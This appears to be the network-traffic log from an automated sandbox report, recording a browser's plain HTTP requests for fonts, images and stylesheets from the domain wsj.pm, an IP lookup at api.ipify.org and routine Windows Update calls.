                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/Retina-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/exchange/Exchange-BookItalic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /vir.wsj.net/fp/assets/webpack4/img/wsj-logo-big-black.165e51cc.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-social-share.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949345.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949675.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948848.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/css/footer.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-948629.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/AM.png HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949113.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-949723.jpeg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-44291453.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/im-647221.avif HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/google-play.4699f3c2.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/appstore.a6e93ba3.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wsj.pmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
